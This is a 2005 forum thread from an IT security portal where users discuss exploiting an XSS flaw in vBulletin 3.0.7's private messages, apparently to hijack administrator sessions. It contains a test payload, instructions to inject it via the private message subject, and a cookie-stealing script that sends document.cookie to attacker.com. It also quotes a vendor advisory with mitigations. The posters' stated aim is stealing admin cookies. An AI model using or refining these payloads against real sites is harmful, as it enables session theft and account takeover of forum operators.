|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 182
Members: 0
Total: 182
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vbulletin 3.0.7 |
|
Posted: Tue Jul 26, 2005 9:58 pm |
|
|
outlawsys |
Regular user |
|
|
Joined: Jun 11, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
is there a security hole or bug in vbulletin 3.0.7? |
|
|
|
|
Posted: Thu Jul 28, 2005 11:40 pm |
|
|
diegocure15 |
Active user |
|
|
Joined: Sep 22, 2004 |
Posts: 27 |
|
|
|
|
|
|
|
yes i like to know that too!!! someone???? |
|
|
|
|
Posted: Tue Aug 02, 2005 9:16 am |
|
|
outlawsys |
Regular user |
|
|
Joined: Jun 11, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
i search the internet and i found a XSS in vBulletin 3.0.7.There is a bug in private.php
i try this code
<script>javascript:alert(document.cookie);</Script>
and i see my cookie informations.
Now how can i use this codes to take admin's cookie informations?
if someone can give me answer, i will be very pleased thankz a lot |
|
|
|
|
Posted: Tue Aug 02, 2005 5:36 pm |
|
|
diegocure15 |
Active user |
|
|
Joined: Sep 22, 2004 |
Posts: 27 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Aug 02, 2005 7:49 pm |
|
|
outlawsys |
Regular user |
|
|
Joined: Jun 11, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
you enter the private message and sent a private message someone and enter the code to SUBJECT. and the preview message |
|
|
|
|
Posted: Tue Aug 02, 2005 8:54 pm |
|
|
diegocure15 |
Active user |
|
|
Joined: Sep 22, 2004 |
Posts: 27 |
|
|
|
|
|
|
|
thanks now we have to find a way that the admins can see that and pull their cookies off it.
i tried this... but too long to fit into subject box
<script>document.write("<img src=http://attacker.com/? + document.cookie + ?>?)</script> |
|
|
|
|
|
|
|
|
Posted: Tue Aug 02, 2005 11:36 pm |
|
|
Matt |
Regular user |
|
|
Joined: Jul 30, 2005 |
Posts: 7 |
|
|
|
|
|
|
|
thats not what you need to do at all.
take a look at a similar exploit for ipb and phpbb using bbcode.
but i did find this on a vbulliten support site:
Quote: | An XSS issue exists within vBulletin 3 in versions up to and including 3.0.7.
Fortunately, the circumstances that allow this XSS issue to be exploited are quite rare so the majority of installations dont have to worry.
Your installation is only vulnerable if:
* You do not Allow Wild Card Searchs or
* You have a very large Search Index Minimum Word Length value (more than ten characters)
If these conditions apply to your board, you can easily secure your installation against XSS exploitation by turning on search wild cards and setting a smaller (6 or less) value for Search Index Minimum Word Length.
Both of these settings can be found in vBulletin Options > Message Searching Options (Default Search)
If you are unable to change these settings, you can simply overwrite the existing includes/functions_search.php file with the one attached to this thread. If neither of the above listed settings apply to your vBulletin Forum, there is no need to download this file at all.
If you need it, you can get the file here: http://www.vbulletin.com/forum/showthread.php?t=133459 |
there ya go, they admited themself they left a bug in it.
apparently its not big enough to allow a new version to be released, but still can cause some damage.
ive tried to look into this, but i couldnt find anything, than again my hacking skills arnt good at all. |
|
|
|
|
|
|
|
|
Posted: Wed Aug 03, 2005 10:54 am |
|
|
outlawsys |
Regular user |
|
|
Joined: Jun 11, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
is there anyone know about something about vbulettin XSS.if someone helps us we will b very pleased |
|
|
|
|
Posted: Wed Aug 03, 2005 10:20 pm |
|
|
diegocure15 |
Active user |
|
|
Joined: Sep 22, 2004 |
Posts: 27 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Aug 05, 2005 2:23 am |
|
|
Matt |
Regular user |
|
|
Joined: Jul 30, 2005 |
Posts: 7 |
|
|
|
|
|
|
|
yeah i saw that already, i posted. i dont see how that can work though. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|